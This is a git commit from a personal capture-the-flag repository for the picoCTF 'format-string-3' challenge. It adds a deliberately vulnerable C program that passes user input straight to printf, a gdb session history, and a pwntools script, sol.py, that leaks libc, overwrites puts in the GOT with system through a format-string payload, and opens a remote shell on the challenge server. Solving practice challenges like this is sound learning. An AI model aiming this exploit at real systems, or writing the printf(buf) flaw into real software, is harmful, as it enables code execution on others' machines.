format string 3

2024-11-04 09:31:53 +01:00
parent b4bd094d7e
commit b67f48744b
9 changed files with 160 additions and 2 deletions
--- a/format_string_2/peda-session-vuln.txt
+++ b/format_string_2/peda-session-vuln.txt
@@ -1,2 +0,0 @@
-break *main+95
-
--- a/format_string_3/.gdb_history
+++ b/format_string_3/.gdb_history
@@ -0,0 +1,89 @@
+exit
+exit
+exit
+run 
+exit
+disassemble main
+b *main+16
+b *main+160
+rm 
+b
+b --info
+help b
+help breakpoints
+exit
+disassemble main
+b *main+160
+run
+continue
+continue < payload
+run < payload
+continue
+con
+cont
+contin
+run < payload
+continue
+disassemble main
+b *main+175
+run < payload
+continue
+continue
+got
+disassemble 0x404018
+x 0x404018
+x/8 0x404018
+x/8w 0x404018
+x/8w2 0x404018
+x/8x2 0x404018
+x/8x2 0x404018
+x/8x2 0x404018
+x/16 0x404018
+run < payload
+disassemble 0x404018
+continue
+disassemble 0x404018
+x/16 0x404018
+x *setvbuf
+search 
+search --0xfa1e0ff3
+search --pointer 0xda1e0ff3
+x *puts
+search --pointer 0x7ffff7e5a3f0
+search --pointer 0x7ffff7e9bf0
+search --pointer 0x7ffff7e59bf0
+disassemble main
+x 0x404018
+plt
+got
+run < payload
+continue
+run
+x *puts
+x setvbuf
+search --pointer 0x7ffff7e59bf0
+x 0x404018
+x/2 0x404018
+x/w 0x404018
+x/d 0x404018
+x/b 0x404018
+x/g 0x404018
+x/a 0x404018
+set {int}0x404018 = 0x7ffffe5a3f0
+x/a 0x404018
+continue
+continue
+disassemble main
+x/2d x04012f2
+run
+x/2d x04012f2
+
+x/2a x04012f2
+x/2a 0x04012f2
+x/4a 0x04012f2
+continue
+continue
+run
+got
+got
+exit
--- a/format_string_3/format-string-3
+++ b/format_string_3/format-string-3
--- a/format_string_3/format-string-3.c
+++ b/format_string_3/format-string-3.c
@@ -0,0 +1,31 @@
+#include <stdio.h>
+
+#define MAX_STRINGS 32
+
+char *normal_string = "/bin/sh";
+
+void setup() {
+	setvbuf(stdin, NULL, _IONBF, 0);
+	setvbuf(stdout, NULL, _IONBF, 0);
+	setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+void hello() {
+	puts("Howdy gamers!");
+	printf("Okay I'll be nice. Here's the address of setvbuf in libc: %p\n", &setvbuf);
+}
+
+int main() {
+	char *all_strings[MAX_STRINGS] = {NULL};
+	char buf[1024] = {'\0'};
+
+	setup();
+	hello();	
+
+	fgets(buf, 1024, stdin);	
+	printf(buf);
+
+	puts(normal_string);
+
+	return 0;
+}
--- a/format_string_3/format-string-3_patched
+++ b/format_string_3/format-string-3_patched
--- a/format_string_3/ld-linux-x86-64.so.2
+++ b/format_string_3/ld-linux-x86-64.so.2
--- a/format_string_3/libc.so.6
+++ b/format_string_3/libc.so.6
--- a/format_string_3/payload
+++ b/format_string_3/payload
--- a/format_string_3/sol.py
+++ b/format_string_3/sol.py
@@ -0,0 +1,40 @@
+#!/usr/bin/env python3
+from pwn import *
+
+context.arch = "amd64"
+
+elf = ELF("libc.so.6")
+
+#conn = process(["./format-string-3_patched"])
+address = "rhea.picoctf.net"
+port = 65145
+conn = remote(address, port)
+
+conn.recvuntil(b"libc: ")
+setvbuf_base = int(conn.recvline(), 16)
+log.info(f"setvbuf base: {hex(setvbuf_base)}")
+libc_base = setvbuf_base - elf.symbols["setvbuf"]
+log.info(f"libc base: {hex(libc_base)}")
+system_base = libc_base + elf.symbols["system"]
+log.info(f"evecve base: {hex(system_base)}")
+
+def discover_offset(payload):
+    log.debug(payload)
+    #c = process(["./format-string-3_patched"])
+    c = remote(address, port)
+    c.recvlines(2)
+    c.sendline(payload)
+    res = c.recvall()
+    log.debug(res)
+    return res
+
+fmt = FmtStr(discover_offset)
+offset = fmt.offset
+
+payload = fmtstr_payload(offset, {0x404018: system_base})
+with open("payload", "wb") as f:
+    f.write(payload)
+    f.close()
+conn.sendline(payload)
+conn.interactive()
+